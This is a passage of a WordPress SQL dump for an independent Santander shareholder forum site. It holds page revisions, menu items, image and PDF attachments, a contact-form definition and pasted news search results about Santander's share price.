15:49:13','',23,'http://santandershareholder.co.uk/23-revision-v1',0,'revision','',0),(25,1,'2017-10-02 15:49:31','2017-10-02 15:49:31','','calendar-of-event','','publish','closed','closed','','calendar-of-events','','','2017-10-14 06:07:40','2017-10-14 06:07:40','',0,'http://santandershareholder.co.uk/?page_id=25',0,'page','',0),(26,1,'2017-10-02 15:49:31','2017-10-02 15:49:31','','calendar-of-events','','inherit','closed','closed','','25-revision-v1','','','2017-10-02 15:49:31','2017-10-02 15:49:31','',25,'http://santandershareholder.co.uk/25-revision-v1',0,'revision','',0),(37,1,'2017-10-14 06:06:56','2017-10-14 06:06:56','','calendar','','publish','closed','closed','','37','','','2017-10-14 06:33:06','2017-10-14 06:33:06','',0,'http://santandershareholder.co.uk/?p=37',5,'nav_menu_item','',0),(38,1,'2017-10-14 06:06:56','2017-10-14 06:06:56',' ','','','publish','closed','closed','','38','','','2017-10-14 06:33:06','2017-10-14 06:33:06','',0,'http://santandershareholder.co.uk/?p=38',8,'nav_menu_item','',0),(39,1,'2017-10-14 06:06:56','2017-10-14 06:06:56',' ','','','publish','closed','closed','','39','','','2017-10-14 06:33:06','2017-10-14 06:33:06','',0,'http://santandershareholder.co.uk/?p=39',6,'nav_menu_item','',0),(40,1,'2017-10-14 06:06:56','2017-10-14 06:06:56','','Home','','publish','closed','closed','','40','','','2017-10-14 06:33:06','2017-10-14 06:33:06','',0,'http://santandershareholder.co.uk/?p=40',1,'nav_menu_item','',0),(41,1,'2017-10-14 06:06:56','2017-10-14 06:06:56','','Financial Information','','publish','closed','closed','','41','','','2017-10-14 06:33:06','2017-10-14 06:33:06','',0,'http://santandershareholder.co.uk/?p=41',2,'nav_menu_item','',0),(42,1,'2017-10-14 06:06:56','2017-10-14 06:06:56',' ','','','publish','closed','closed','','42','','','2017-10-14 06:33:06','2017-10-14 06:33:06','',10,'http://santandershareholder.co.uk/?p=42',3,'nav_menu_item','',0),(43,1,'2017-10-14 06:06:56','2017-10-14 06:06:56',' ','','','publish','closed','closed','','43','','','2017-10-14 06:33:06','2017-10-14 06:33:06','',13,'http://santandershareholder.co.uk/?p=43',4,'nav_menu_item','',0),(44,1,'2017-10-14 06:06:56','2017-10-14 06:06:56',' ','','','publish','closed','closed','','44','','','2017-10-14 06:33:06','2017-10-14 06:33:06','',0,'http://santandershareholder.co.uk/?p=44',7,'nav_menu_item','',0),(48,1,'2017-10-14 06:07:22','2017-10-14 06:07:22','','financial-information','','inherit','closed','closed','','8-revision-v1','','','2017-10-14 06:07:22','2017-10-14 06:07:22','',8,'http://santandershareholder.co.uk/8-revision-v1',0,'revision','',0),(49,1,'2017-10-14 06:07:40','2017-10-14 06:07:40','','calendar-of-event','','inherit','closed','closed','','25-revision-v1','','','2017-10-14 06:07:40','2017-10-14 06:07:40','',25,'http://santandershareholder.co.uk/25-revision-v1',0,'revision','',0),(50,1,'2017-10-14 06:07:46','2017-10-14 06:07:46','','contact','','inherit','closed','closed','','23-revision-v1','','','2017-10-14 06:07:46','2017-10-14 06:07:46','',23,'http://santandershareholder.co.uk/23-revision-v1',0,'revision','',0),(54,1,'2017-10-14 06:15:17','2017-10-14 06:15:17','','AAEAAQAAAAAAAA0BAAAAJDgzZjI5ZTk3LWUyYjUtNGU4Ny04YTI2LWVkNWI0MzkzZTFmYQ','','inherit','open','closed','','aaeaaqaaaaaaaa0baaaajdgzzji5ztk3lwuyyjutngu4ny04yti2lwvknwi0mzkzztfmyq','','','2017-10-14 06:15:17','2017-10-14 06:15:17','',0,'http://santandershareholder.co.uk/wp-content/uploads/2017/10/AAEAAQAAAAAAAA0BAAAAJDgzZjI5ZTk3LWUyYjUtNGU4Ny04YTI2LWVkNWI0MzkzZTFmYQ.png',0,'attachment','image/png',0),(55,1,'2017-10-14 06:15:26','2017-10-14 06:15:26','','cropped-AAEAAQAAAAAAAA0BAAAAJDgzZjI5ZTk3LWUyYjUtNGU4Ny04YTI2LWVkNWI0MzkzZTFmYQ.png','','inherit','open','closed','','cropped-aaeaaqaaaaaaaa0baaaajdgzzji5ztk3lwuyyjutngu4ny04yti2lwvknwi0mzkzztfmyq-png','','','2017-10-14 06:15:26','2017-10-14 06:15:26','',0,'http://santandershareholder.co.uk/wp-content/uploads/2017/10/cropped-AAEAAQAAAAAAAA0BAAAAJDgzZjI5ZTk3LWUyYjUtNGU4Ny04YTI2LWVkNWI0MzkzZTFmYQ.png',0,'attachment','image/png',0),(57,1,'2017-10-14 06:18:50','2017-10-14 06:18:50','','beautiful-71493_640','','inherit','open','closed','','beautiful-71493_640','','','2017-10-14 06:18:50','2017-10-14 06:18:50','',0,'http://santandershareholder.co.uk/wp-content/uploads/2017/10/beautiful-71493_640.jpg',0,'attachment','image/jpeg',0),(58,1,'2017-10-14 06:18:57','2017-10-14 06:18:57','','cropped-beautiful-71493_640.jpg','','inherit','open','closed','','cropped-beautiful-71493_640-jpg','','','2017-10-14 06:18:57','2017-10-14 06:18:57','',0,'http://santandershareholder.co.uk/wp-content/uploads/2017/10/cropped-beautiful-71493_640.jpg',0,'attachment','image/jpeg',0),(59,1,'2017-10-14 06:19:38','2017-10-14 06:19:38','','00-09-53-823_640x420','','inherit','open','closed','','00-09-53-823_640x420','','','2017-10-14 06:19:38','2017-10-14 06:19:38','',0,'http://santandershareholder.co.uk/wp-content/uploads/2017/10/00-09-53-823_640x420.jpg',0,'attachment','image/jpeg',0),(60,1,'2017-10-14 06:19:40','2017-10-14 06:19:40','','00-28-02-944_640x420','','inherit','open','closed','','00-28-02-944_640x420','','','2017-10-14 06:19:40','2017-10-14 06:19:40','',0,'http://santandershareholder.co.uk/wp-content/uploads/2017/10/00-28-02-944_640x420.jpg',0,'attachment','image/jpeg',0),(61,1,'2017-10-14 06:19:41','2017-10-14 06:19:41','','02-05-26-748_640x420','','inherit','open','closed','','02-05-26-748_640x420','','','2017-10-14 06:19:41','2017-10-14 06:19:41','',0,'http://santandershareholder.co.uk/wp-content/uploads/2017/10/02-05-26-748_640x420.jpg',0,'attachment','image/jpeg',0),(62,1,'2017-10-14 06:19:42','2017-10-14 06:19:42','','08-45-35-418_640x420','','inherit','open','closed','','08-45-35-418_640x420','','','2017-10-14 06:19:42','2017-10-14 06:19:42','',0,'http://santandershareholder.co.uk/wp-content/uploads/2017/10/08-45-35-418_640x420.jpg',0,'attachment','image/jpeg',0),(63,1,'2017-10-14 06:19:43','2017-10-14 06:19:43','','09-34-06-847_640x420','','inherit','open','closed','','09-34-06-847_640x420','','','2017-10-14 06:19:43','2017-10-14 06:19:43','',0,'http://santandershareholder.co.uk/wp-content/uploads/2017/10/09-34-06-847_640x420.jpg',0,'attachment','image/jpeg',0),(64,1,'2017-10-14 06:19:44','2017-10-14 06:19:44','','09-47-30-89_640','','inherit','open','closed','','09-47-30-89_640','','','2017-10-14 06:19:44','2017-10-14 06:19:44','',0,'http://santandershareholder.co.uk/wp-content/uploads/2017/10/09-47-30-89_640.jpg',0,'attachment','image/jpeg',0),(65,1,'2017-10-14 06:19:45','2017-10-14 06:19:45','','13-11-37-913_640','','inherit','open','closed','','13-11-37-913_640','','','2017-10-14 06:19:45','2017-10-14 06:19:45','',0,'http://santandershareholder.co.uk/wp-content/uploads/2017/10/13-11-37-913_640.jpg',0,'attachment','image/jpeg',0),(66,1,'2017-10-14 06:19:46','2017-10-14 06:19:46','','13-33-43-26_640x420','','inherit','open','closed','','13-33-43-26_640x420','','','2017-10-14 06:19:46','2017-10-14 06:19:46','',0,'http://santandershareholder.co.uk/wp-content/uploads/2017/10/13-33-43-26_640x420.jpg',0,'attachment','image/jpeg',0),(67,1,'2017-10-14 06:19:48','2017-10-14 06:19:48','','18-17-17-737_640x420','','inherit','open','closed','','18-17-17-737_640x420','','','2017-10-14 06:19:48','2017-10-14 06:19:48','',0,'http://santandershareholder.co.uk/wp-content/uploads/2017/10/18-17-17-737_640x420.jpg',0,'attachment','image/jpeg',0),(68,1,'2017-10-14 06:19:48','2017-10-14 06:19:48','','21-32-39-259_640','','inherit','open','closed','','21-32-39-259_640','','','2017-10-14 06:19:48','2017-10-14 06:19:48','',0,'http://santandershareholder.co.uk/wp-content/uploads/2017/10/21-32-39-259_640.jpg',0,'attachment','image/jpeg',0),(69,1,'2017-10-14 06:19:51','2017-10-14 06:19:51','','22-43-32-144_640','','inherit','open','closed','','22-43-32-144_640','','','2017-10-14 06:19:51','2017-10-14 06:19:51','',0,'http://santandershareholder.co.uk/wp-content/uploads/2017/10/22-43-32-144_640.jpg',0,'attachment','image/jpeg',0),(70,1,'2017-10-14 06:19:53','2017-10-14 06:19:53','','23-03-09-602_640','','inherit','open','closed','','23-03-09-602_640','','','2017-10-14 06:19:53','2017-10-14 06:19:53','',0,'http://santandershareholder.co.uk/wp-content/uploads/2017/10/23-03-09-602_640.png',0,'attachment','image/png',0),(71,1,'2017-10-14 06:19:55','2017-10-14 06:19:55','','23-08-46-769_640x420','','inherit','open','closed','','23-08-46-769_640x420','','','2017-10-14 06:19:55','2017-10-14 06:19:55','',0,'http://santandershareholder.co.uk/wp-content/uploads/2017/10/23-08-46-769_640x420.jpg',0,'attachment','image/jpeg',0),(72,1,'2017-10-14 06:19:58','2017-10-14 06:19:58','','cropped-13-33-43-26_640x420.jpg','','inherit','open','closed','','cropped-13-33-43-26_640x420-jpg','','','2017-10-14 06:19:58','2017-10-14 06:19:58','',0,'http://santandershareholder.co.uk/wp-content/uploads/2017/10/cropped-13-33-43-26_640x420.jpg',0,'attachment','image/jpeg',0),(73,1,'2017-10-14 06:20:25','2017-10-14 06:20:25','','cropped-23-08-46-769_640x420.jpg','','inherit','open','closed','','cropped-23-08-46-769_640x420-jpg','','','2017-10-14 06:20:25','2017-10-14 06:20:25','',0,'http://santandershareholder.co.uk/wp-content/uploads/2017/10/cropped-23-08-46-769_640x420.jpg',0,'attachment','image/jpeg',0),(75,1,'2017-10-14 06:35:37','2017-10-14 06:35:37','The purpose of this website is to give UK Santander Share holders a forum to voice any satisfaction or dissatification with Santander. The site is NOT associated with Santander or any Santander holding company. If you would like to get in touch with this site\'s webmaster then <a href=\"http://santandershareholder.co.uk/contact-us\">click here.</a>\n\nWe believe that Santander has not always worked in the best interested of it share holders. We believe that we are not alone in believing this. We would like to hear from other share holders who hold the same options and could elaborate on how best we put pressure on Santander to listen to our objections.\n\nBelow are some links you might find interesting\n<ul>\n <li><a href=\"http://www.santander.co.uk/uk/about-santander-uk/investor-relations/events-calendar\" target=\"_blank\" rel=\"noopener\">Here is the calendar for the next results announcements.</a></li>\n <li class=\"tituloflex\"><a href=\"https://www.santander.com/csgs/Satellite/CFWCSancomQP01/en_GB/Corporate/Press-room/Santander-News/2017/10/10/Santander-increases-profitability-target-for-2018-.html\" target=\"_self\">Santander increases profitability target for 2018 </a></li>\n</ul>\nDividends\n\nIf you feel that the progress and value of Santander share dvidend payments have not been the amount that you had hoped for then please click here.','shareholder-services','','inherit','closed','closed','','17-autosave-v1','','','2017-10-14 06:35:37','2017-10-14 06:35:37','',17,'http://santandershareholder.co.uk/17-autosave-v1',0,'revision','',0),(76,1,'2017-10-14 06:26:35','2017-10-14 06:26:35','The purpose of this website is to give UK Santander Share holders a forum to voice any satisfaction or dissatification with Santander. The site is NOT associated with Santander or any Santander holding company. If you would like to get in touch with this site\'s webmaster then click here.\r\n\r\nWe believe that Santander has not always worked in the best interested of it share holders. We believe that we are not alone in believing this. We would like to hear from other share holders who hold the same options and could elaborate on how best we put pressure on Santander to listen to our objections.\r\n\r\n<a href=\"http://www.santander.co.uk/uk/about-santander-uk/investor-relations/events-calendar\" target=\"_blank\" rel=\"noopener\">Here is the calander for the next general meetings.</a>','shareholder-services','','inherit','closed','closed','','17-revision-v1','','','2017-10-14 06:26:35','2017-10-14 06:26:35','',17,'http://santandershareholder.co.uk/17-revision-v1',0,'revision','',0),(77,1,'2017-10-14 06:28:27','2017-10-14 06:28:27','The purpose of this website is to give UK Santander Share holders a forum to voice any satisfaction or dissatification with Santander. The site is NOT associated with Santander or any Santander holding company. If you would like to get in touch with this site\'s webmaster then click here.\r\n\r\nWe believe that Santander has not always worked in the best interested of it share holders. We believe that we are not alone in believing this. We would like to hear from other share holders who hold the same options and could elaborate on how best we put pressure on Santander to listen to our objections.\r\n\r\nBelow are some links you might find interesting\r\n<ul>\r\n <li><a href=\"http://www.santander.co.uk/uk/about-santander-uk/investor-relations/events-calendar\" target=\"_blank\" rel=\"noopener\">Here is the calendar for the next results announcements.</a></li>\r\n <li class=\"tituloflex\"><a href=\"https://www.santander.com/csgs/Satellite/CFWCSancomQP01/en_GB/Corporate/Press-room/Santander-News/2017/10/10/Santander-increases-profitability-target-for-2018-.html\" target=\"_self\">Santander increases profitability target for 2018 </a></li>\r\n</ul>','shareholder-services','','inherit','closed','closed','','17-revision-v1','','','2017-10-14 06:28:27','2017-10-14 06:28:27','',17,'http://santandershareholder.co.uk/17-revision-v1',0,'revision','',0),(79,1,'2017-10-14 06:30:01','2017-10-14 06:30:01','The purpose of this website is to give UK Santander Share holders a forum to voice any satisfaction or dissatification with Santander. The site is NOT associated with Santander or any Santander holding company. If you would like to get in touch with this site\'s webmaster then <a href=\"http://santandershareholder.co.uk/contact-us\">click here.</a>\r\n\r\nWe believe that Santander has not always worked in the best interested of it share holders. We believe that we are not alone in believing this. We would like to hear from other share holders who hold the same options and could elaborate on how best we put pressure on Santander to listen to our objections.\r\n\r\nBelow are some links you might find interesting\r\n<ul>\r\n <li><a href=\"http://www.santander.co.uk/uk/about-santander-uk/investor-relations/events-calendar\" target=\"_blank\" rel=\"noopener\">Here is the calendar for the next results announcements.</a></li>\r\n <li class=\"tituloflex\"><a href=\"https://www.santander.com/csgs/Satellite/CFWCSancomQP01/en_GB/Corporate/Press-room/Santander-News/2017/10/10/Santander-increases-profitability-target-for-2018-.html\" target=\"_self\">Santander increases profitability target for 2018 </a></li>\r\n</ul>','shareholder-services','','inherit','closed','closed','','17-revision-v1','','','2017-10-14 06:30:01','2017-10-14 06:30:01','',17,'http://santandershareholder.co.uk/17-revision-v1',0,'revision','',0),(80,1,'2017-10-14 06:45:41','2017-10-14 06:45:41','Santander generally pays dividends four times a year, in February, May, August and November. As will all investments you can receive less return on an investment than you thought. If you have a story on your dividend receipts and why they may not be improving as much as you had thought then please get in touch.\n\n<a href=\"http://santandershareholder.co.uk/wp-content/uploads/2017/10/Dividend-History-to-August-2017.pdf\">Dividend-History-to-August-2017</a>\n<div></div>','Dividends','','inherit','closed','closed','','10-autosave-v1','','','2017-10-14 06:45:41','2017-10-14 06:45:41','',10,'http://santandershareholder.co.uk/10-autosave-v1',0,'revision','',0),(81,1,'2017-10-14 06:32:32','2017-10-14 06:32:32','','Dividend-History-to-August-2017','','inherit','open','closed','','dividend-history-to-august-2017','','','2017-10-14 06:32:32','2017-10-14 06:32:32','',10,'http://santandershareholder.co.uk/wp-content/uploads/2017/10/Dividend-History-to-August-2017.pdf',0,'attachment','application/pdf',0),(82,1,'2017-10-14 06:32:37','2017-10-14 06:32:37','Santander generally pays dividends four times a year, in February, May, August and November. As will all investments you can receive less return on an investment than you thought. If you have a story on your dividend receipts and why they may not be improving as much as you had thought then please get in touch.\r\n\r\n<a href=\"http://santandershareholder.co.uk/wp-content/uploads/2017/10/Dividend-History-to-August-2017.pdf\">Dividend-History-to-August-2017</a>','Dividends','','inherit','closed','closed','','10-revision-v1','','','2017-10-14 06:32:37','2017-10-14 06:32:37','',10,'http://santandershareholder.co.uk/10-revision-v1',0,'revision','',0),(83,1,'2017-10-14 06:35:48','2017-10-14 06:35:48','The purpose of this website is to give UK Santander Share holders a forum to voice any satisfaction or dissatification with Santander. The site is NOT associated with Santander or any Santander holding company. If you would like to get in touch with this site\'s webmaster then <a href=\"http://santandershareholder.co.uk/contact-us\">click here.</a>\r\n\r\nWe believe that Santander has not always worked in the best interested of it share holders. We believe that we are not alone in believing this. We would like to hear from other share holders who hold the same options and could elaborate on how best we put pressure on Santander to listen to our objections.\r\n\r\nBelow are some links you might find interesting\r\n<ul>\r\n <li><a href=\"http://www.santander.co.uk/uk/about-santander-uk/investor-relations/events-calendar\" target=\"_blank\" rel=\"noopener\">Here is the calendar for the next results announcements.</a></li>\r\n <li class=\"tituloflex\"><a href=\"https://www.santander.com/csgs/Satellite/CFWCSancomQP01/en_GB/Corporate/Press-room/Santander-News/2017/10/10/Santander-increases-profitability-target-for-2018-.html\" target=\"_self\">Santander increases profitability target for 2018 </a></li>\r\n</ul>\r\nDividends\r\n\r\nIf you feel that the progress and value of Santander share dividend payments have not been the amount that you had hoped for then please <a href=\"http://santandershareholder.co.uk/financial-information\">click here.</a>','shareholder-services','','inherit','closed','closed','','17-revision-v1','','','2017-10-14 06:35:48','2017-10-14 06:35:48','',17,'http://santandershareholder.co.uk/17-revision-v1',0,'revision','',0),(84,1,'2017-10-14 06:36:35','2017-10-14 06:36:35','<a href=\"http://santandershareholder.co.uk/wp-content/uploads/2017/10/Dividend-History-to-August-2017.pdf\">Dividend-History-to-August-2017</a>','Dividends history','','inherit','closed','closed','','13-revision-v1','','','2017-10-14 06:36:35','2017-10-14 06:36:35','',13,'http://santandershareholder.co.uk/13-revision-v1',0,'revision','',0),(85,1,'2017-10-14 06:37:13','2017-10-14 06:37:13','<p>This is the WPForms preview page. All your form previews will be handled on this page.</p><p>The page is set to private, so it is not publicly accessible. Please do not delete this page :) .</p>','WPForms Preview','','private','closed','closed','','wpforms-preview','','','2017-10-14 06:37:13','2017-10-14 06:37:13','',0,'http://santandershareholder.co.uk/wpforms-preview',0,'page','',0),(86,1,'2017-10-14 06:37:30','2017-10-14 06:37:30','{\"id\":\"86\",\"field_id\":5,\"fields\":[{\"id\":\"0\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},{\"id\":\"1\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"Please enter your email, so we can follow up with you.\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},{\"id\":\"2\",\"type\":\"radio\",\"label\":\"Do you own shares in Santander?\",\"choices\":{\"1\":{\"label\":\"Yes\",\"value\":\"\"},\"2\":{\"label\":\"No\",\"value\":\"\"},\"3\":{\"label\":\"Have in the past\",\"value\":\"\"},\"4\":{\"label\":\"Other\",\"value\":\"\"}},\"description\":\"\",\"required\":\"1\",\"input_columns\":\"\",\"css\":\"\",\"dynamic_choices\":\"\"},{\"id\":\"3\",\"type\":\"text\",\"label\":\"Subject\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},{\"id\":\"4\",\"type\":\"textarea\",\"label\":\"Message\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"css\":\"\"}],\"settings\":{\"form_title\":\"Contact Us\",\"form_desc\":\"\",\"form_class\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"submit_class\":\"\",\"honeypot\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New Entry: Suggestion Form\",\"sender_name\":\"{field_id=\\\"0\\\"}\",\"sender_address\":\"{field_id=\\\"1\\\"}\",\"replyto\":\"\",\"message\":\"{all_fields}\",\"notification_name\":\"\"}},\"confirmation_type\":\"message\",\"confirmation_message\":\"Thanks for contacting us! We will be in touch with you shortly.\",\"confirmation_message_scroll\":\"1\",\"confirmation_page\":\"25\",\"confirmation_redirect\":\"\"},\"meta\":{\"template\":\"suggestion\"}}','Contact Us','','publish','closed','closed','','suggestion-form','','','2017-10-14 06:38:51','2017-10-14 06:38:51','',0,'http://santandershareholder.co.uk/?post_type=wpforms&p=86',0,'wpforms','',0),(87,1,'2017-10-14 06:39:27','2017-10-14 06:39:27','[wpforms id=\"86\" title=\"false\" description=\"false\"]','contact','','inherit','closed','closed','','23-revision-v1','','','2017-10-14 06:39:27','2017-10-14 06:39:27','',23,'http://santandershareholder.co.uk/23-revision-v1',0,'revision','',0),(89,1,'2017-10-14 06:46:13','2017-10-14 06:46:13','Santander generally pays dividends four times a year, in February, May, August and November. As will all investments you can receive less return on an investment than you thought. If you have a story on your dividend receipts and why they may not be improving as much as you had thought then please get in touch.\r\n\r\n<a href=\"http://santandershareholder.co.uk/wp-content/uploads/2017/10/Dividend-History-to-August-2017.pdf\">Dividend-History-to-August-2017</a>\r\n<div></div>','Dividends','','inherit','closed','closed','','10-revision-v1','','','2017-10-14 06:46:13','2017-10-14 06:46:13','',10,'http://santandershareholder.co.uk/10-revision-v1',0,'revision','',0),(90,1,'2017-10-14 06:46:40','2017-10-14 06:46:40','<div class=\"g\">\r\n<div class=\"ts _JGs _JHs _tJs _KGs _jHs\">\r\n<div class=\"_hJs\">\r\n<h3 class=\"r _gJs\"><a class=\"l _PMs\" href=\"http://news4j.com/2017/10/14/stock-that-can-flourish-your-investment-banco-santander-s-a-san/\"><em>Stock</em> that can flourish your investment: Banco <em>Santander</em>, SA (SAN)</a></h3>\r\n<div class=\"slp\"><span class=\"_OHs _PHs\">The News Journal</span><span class=\"_QGs\">-</span><span class=\"f nsa _QHs\">1 hour ago</span></div>\r\n<div class=\"st\">Banco <em>Santander</em>, S.A. SAN began its day with a <em>share price</em> of 6.59. .... The outstanding shares for Banco <em>Santander</em>, S.A. is 15771.01 with a ...</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"g\">\r\n<div class=\"ts _JGs _JHs _tJs _KGs _jHs\">\r\n<div class=\"_hJs\">\r\n<h3 class=\"r _gJs\"><a class=\"l _PMs\" href=\"https://postanalyst.com/2017/10/13/analyst-stance-on-two-stocks-bioline-rx-ltd-blrx-banco-santander-s-a-san/\">Analyst Stance On Two Stocks: BioLine Rx Ltd (BLRX), Banco ...</a></h3>\r\n<div class=\"slp\"><span class=\"_OHs _PHs\">Post Analyst</span><span class=\"_QGs\">-</span><span class=\"f nsa _QHs\">11 hours ago</span></div>\r\n<div class=\"st\">The <em>share price</em> has moved forward from its 20 days moving average, ... Turning to Banco <em>Santander</em>, S.A. (NYSE:SAN), its shares were trading ...</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"g\">\r\n<div class=\"ts _JGs _KHs _oGs _LGs _jHs\"><a class=\"top _xGs _SHs\" href=\"http://www.autofinancenews.net/santander-aims-to-bolster-fca-relationship-with-executive-shuffle/\"><img class=\"th _RGs\" src=\"https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTbJ2zq6Zx1InMYrMYbgyiqd_hVMUVppCp49SEZcYTGn6OYA439y_RIcbWnXnn_-l7Vz1UUwUg\" alt=\"Story image for santander share price from Auto Finance News\" /></a>\r\n<div class=\"_iHs f\">Auto Finance News</div>\r\n<div class=\"_hJs\">\r\n<h3 class=\"r _gJs\"><a class=\"l _PMs\" href=\"https://www.stocknewsjournal.com/2017/10/13/why-to-keeping-eye-on-ally-financial-inc-ally-santander-consumer-usa-holdings-inc-sc/\">Why to Keeping Eye on Ally Financial Inc. (ALLY), <em>Santander</em> ...</a></h3>\r\n<div class=\"slp\"><span class=\"_OHs _PHs\">StockNewsJournal</span><span class=\"_QGs\">-</span><span class=\"f nsa _QHs\">14 hours ago</span></div>\r\n<div class=\"st\">The <em>stock</em> ended last trade at $23.96 a <em>share</em> and the <em>price</em> is up more than 25.97% so far this year. The company maintains <em>price</em> to book ratio ...</div>\r\n</div>\r\n<div class=\"_sJs card-section\"><a class=\"_pJs\" href=\"https://www.allstocknews.com/2017/10/13/critical-levels-to-breach-santander-consumer-usa-holdings-inc-sc-meritor-inc-mtor/\">Critical Levels To Breach: <em>Santander</em> Consumer USA Holdings Inc ...</a>\r\n<span class=\"nsa _OHs f _PHs\">AllStockNews</span><span class=\"_QGs\">-</span><span class=\"nsa _QHs f\">11 hours ago</span>\r\n<div class=\"_NMs\"><a class=\"_OMs\" href=\"https://news.google.com/news?ncl=d6k4kXGmPtFITTMQLDRz3S_EwP2QM&q=santander+share+price&lr=English&hl=en&sa=X&ved=0ahUKEwiqnJv-we_WAhXEuBoKHZdZBj0QqgIIKzAC\">View all</a></div>\r\n</div>\r\n<div class=\"_cJs\"></div>\r\n</div>\r\n</div>\r\n<div class=\"g\">\r\n<div class=\"ts _JGs _JHs _tJs _KGs _jHs\">\r\n<div class=\"_hJs\">\r\n<h3 class=\"r _gJs\"><a class=\"l _PMs\" href=\"http://www.stocksgallery.com/2017/10/13/banco-santander-s-a-san-has-a-value-of-6-64-per-share-while-bank-of-the-ozarks-ozrk-is-stand-at-45-70/\">Banco <em>Santander</em>, SA (SAN) has a value of $6.64 per <em>share</em> While ...</a></h3>\r\n<div class=\"slp\"><span class=\"_OHs _PHs\">Stocks Gallery</span><span class=\"_QGs\">-</span><span class=\"f nsa _QHs\">16 hours ago</span></div>\r\n<div class=\"st\">In recent trading day Banco <em>Santander</em>, S.A. (SAN) <em>stock</em> showed the move of -0.90% with the closing <em>price</em> of $6.64. Closing <em>price</em> generally ...</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"g\">\r\n<div class=\"ts _JGs _JHs _tJs _KGs _jHs\">\r\n<div class=\"_hJs\">\r\n<h3 class=\"r _gJs\"><a class=\"l _PMs\" href=\"https://stocknewsgazette.com/2017/10/12/banco-santander-s-a-nysesan-gives-mixed-technical-signals-today/\">Banco <em>Santander</em>, SA (NYSE:SAN) Gives Mixed Technical Signals ...</a></h3>\r\n<div class=\"slp\"><span class=\"_OHs _PHs\">StockNewsGazette</span><span class=\"_QGs\">-</span><span class=\"f nsa _QHs\">12 Oct 2017</span></div>\r\n<div class=\"st\">Banco <em>Santander</em>, S.A. (NYSE:SAN) fell by -1.76% in Wednesday\'s trading session from $6.82 to $6.70 The <em>stock price</em> went upward in 6 of the ...</div>\r\n</div>\r\n</div>\r\n</div>','In the News','','inherit','closed','closed','','8-revision-v1','','','2017-10-14 06:46:40','2017-10-14 06:46:40','',8,'http://santandershareholder.co.uk/8-revision-v1',0,'revision','',0),(91,1,'2017-10-14 06:46:57','2017-10-14 06:46:57','<div class=\"g\">\r\n<div class=\"ts _JGs _JHs _tJs _KGs _jHs\">\r\n<div class=\"_hJs\">\r\n<h3 class=\"r _gJs\"><a class=\"l _PMs\" href=\"http://news4j.com/2017/10/14/stock-that-can-flourish-your-investment-banco-santander-s-a-san/\"><em>Stock</em> that can flourish your investment: Banco <em>Santander</em>, SA (SAN)</a></h3>\r\n<div class=\"slp\"><span class=\"_OHs _PHs\">The News Journal</span><span class=\"_QGs\">-</span><span class=\"f nsa _QHs\">1 hour ago</span></div>\r\n<div class=\"st\">Banco <em>Santander</em>, S.A. SAN began its day with a <em>share price</em> of 6.59. .... The outstanding shares for Banco <em>Santander</em>, S.A. is 15771.01 with a ...</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"g\">\r\n<div class=\"ts _JGs _JHs _tJs _KGs _jHs\">\r\n<div class=\"_hJs\">\r\n<h3 class=\"r _gJs\"><a class=\"l _PMs\" href=\"https://postanalyst.com/2017/10/13/analyst-stance-on-two-stocks-bioline-rx-ltd-blrx-banco-santander-s-a-san/\">Analyst Stance On Two Stocks: BioLine Rx Ltd (BLRX), Banco ...</a></h3>\r\n<div class=\"slp\"><span class=\"_OHs _PHs\">Post Analyst</span><span class=\"_QGs\">-</span><span class=\"f nsa _QHs\">11 hours ago</span></div>\r\n<div class=\"st\">The <em>share price</em> has moved forward from its 20 days moving average, ... Turning to Banco <em>Santander</em>, S.A. (NYSE:SAN), its shares were trading ...</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"g\">\r\n<div class=\"ts _JGs _KHs _oGs _LGs _jHs\">\r\n\r\n<a class=\"top _xGs _SHs\" href=\"http://www.autofinancenews.net/santander-aims-to-bolster-fca-relationship-with-executive-shuffle/\"><img class=\"th _RGs\" src=\"https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTbJ2zq6Zx1InMYrMYbgyiqd_hVMUVppCp49SEZcYTGn6OYA439y_RIcbWnXnn_-l7Vz1UUwUg\" alt=\"Story image for santander share price from Auto Finance News\" /></a>\r\n<div class=\"_iHs f\">Auto Finance News</div>\r\n<div class=\"_hJs\">\r\n<h3 class=\"r _gJs\"><a class=\"l _PMs\" href=\"https://www.stocknewsjournal.com/2017/10/13/why-to-keeping-eye-on-ally-financial-inc-ally-santander-consumer-usa-holdings-inc-sc/\">Why to Keeping Eye on Ally Financial Inc. (ALLY), <em>Santander</em> ...</a></h3>\r\n<div class=\"slp\"><span class=\"_OHs _PHs\">StockNewsJournal</span><span class=\"_QGs\">-</span><span class=\"f nsa _QHs\">14 hours ago</span></div>\r\n<div class=\"st\">The <em>stock</em> ended last trade at $23.96 a <em>share</em> and the <em>price</em> is up more than 25.97% so far this year. The company maintains <em>price</em> to book ratio ...</div>\r\n</div>\r\n<div class=\"_sJs card-section\"><a class=\"_pJs\" href=\"https://www.allstocknews.com/2017/10/13/critical-levels-to-breach-santander-consumer-usa-holdings-inc-sc-meritor-inc-mtor/\">Critical Levels To Breach: <em>Santander</em> Consumer USA Holdings Inc ...</a>\r\n<span class=\"nsa _OHs f _PHs\">AllStockNews</span><span class=\"_QGs\">-</span><span class=\"nsa _QHs f\">11 hours ago</span>\r\n<div class=\"_NMs\"><a class=\"_OMs\" 